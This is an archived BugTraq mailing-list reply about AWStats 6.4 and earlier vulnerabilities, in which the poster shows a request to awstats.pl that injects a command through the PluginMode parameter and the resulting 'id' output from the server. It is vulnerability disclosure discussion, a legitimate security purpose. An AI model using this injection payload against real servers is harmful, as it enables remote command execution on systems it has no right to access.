BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Feb 15 2005 07:52PM
Ondra Holecek (bln deprese net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It seems this bug works only on my server, i dont know why

/awstats.pl?&PluginMode=:print+system('id')+;

reply:

uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
Error:

Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
pe...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus